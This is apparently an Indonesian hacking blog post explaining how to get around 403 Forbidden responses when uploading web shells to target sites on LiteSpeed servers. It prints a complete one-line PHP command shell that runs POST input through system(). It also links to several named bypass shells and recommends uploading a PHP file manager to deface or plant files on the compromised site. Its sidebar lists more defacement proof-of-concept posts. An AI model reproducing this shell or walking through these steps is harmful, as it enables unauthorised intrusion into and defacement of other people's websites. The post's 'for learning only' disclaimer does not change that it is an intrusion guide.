Cara Bypass 403 Saat Upload Shell Di Litespeed Web Server

Tuesday, February 16, 2021

Hallo bang jago/neng jago 😆

Pernah nggak kalian mengalami Forbidden pada saat upload shell di web yang menggunakan web server Litespeed? Kalo pernah tutorial ini pas buat kalian, Karna di artikel kali ini gw akan share ke kalian tutorial ngatasin itu 😊

Note : Tutorial ini dibuat hanya untuk pembelajaran, Segala tindak-tanduk pembaca yang terinspirasi dari blog ini itu tanggung jawab masing-masing.

Oke tanpa berlama-lama lagi langsung aja ke tutorialnya.

Menggunakan CMD Shell

Cara ini terbilang cukup mudah tetapi harus pastikan web target bisa mengeksekusi command, Dalam kata lain tidak terhalang oleh disable functions 😁

CMD shell:

<pre><form method=post>root@0x4u:~# <input name=cmd value=<?php $_POST['cmd'];?>></form><?php if(isset($_POST['cmd']) && $_POST['cmd']!=''){system($_POST['cmd'].' 2>&1');}?></pre>

Atau bisa juga copy disini : Click here!

Menggunakan bypass shell

Cara kedua ini patut di coba, Gw pribadi juga sering pake cara yang ini karna biasanya berhasil.

Berikut daftar bypass shell menurut gw pribadi.

Marijuana : Click here!
0byte : Click here!
Evil twin : Click here!
Tmp : Click here!
Summon : Click Here!

Kalian bisa coba sendiri satu persatu siapa tau ada yang cocok 😂

Menggunakan PHP Filemanager

Yapss, Cara terakhir ini yang paling gw andelin buat bypass 403 forbidden saat upload shell di web target yang bandel.

PHP Filemanager ini menurut gw mantep banget, walaupun size nya mayan gede (800kb) tapi bisa keupload dengan mulus.

Oiya disini gw akan mencoba upload TMP shell yang terkenal bisa bypass.

Dan ini hasilnya setelah gw tap Upload.

Baa forbidden wkwk, Dan ini setelah gw coba upload MARIJUANA yang terkenal juga bisa bypass.

Dan ini hasilnya.

Tetap forbidden wkwk, Sekarang coba kita pakai PHP Filemanager, Sebelum itu download dulu PHP Filemanager nya disini : https://sourceforge.net/projects/phpfm/

Kalo udah di download langsung aja upload gausah kelamaan 😂

Dan ini hasilnya setelah gw tap tombol Upload.

Yapss berhasil keupload 😎 Sekarang kita coba akses aja PHP Filemanager yang tadi diupload dan BOOOM!

Berhasil deh, Kalo udah kayak gitu kalian bebas ngapain aja mau ngindex atau titip file, Tapi disarankan agar backup terlebih dahulu kalo mau ngindex 😓

Oke mungkin cukup sekian tutorial dari gw, Semoga bermanfaat!

Jangan lupa juga share artikel ini ke teman-teman kalian juga ya, Biar gw semangat terus buat nulis di blog kecil ini, hehe 😊

Thanks to : ZSec a.k.a Edo

0x4u

Cara Bypass 403 Saat Upload Shell Di Litespeed Web Server

Menggunakan CMD Shell

Menggunakan bypass shell

Menggunakan PHP Filemanager

Post a Comment

Deface POC Responsive File Manager (RFM) - Upload Shell

Zone-H Archive Grabber By Mr Joker

Deface POC SQLi Into Outfile (POST Method) - Upload Shell

Deface POC Bypass Admin No Redirect - Upload Shell

Deface POC KCFinder With CSRF - Upload Shell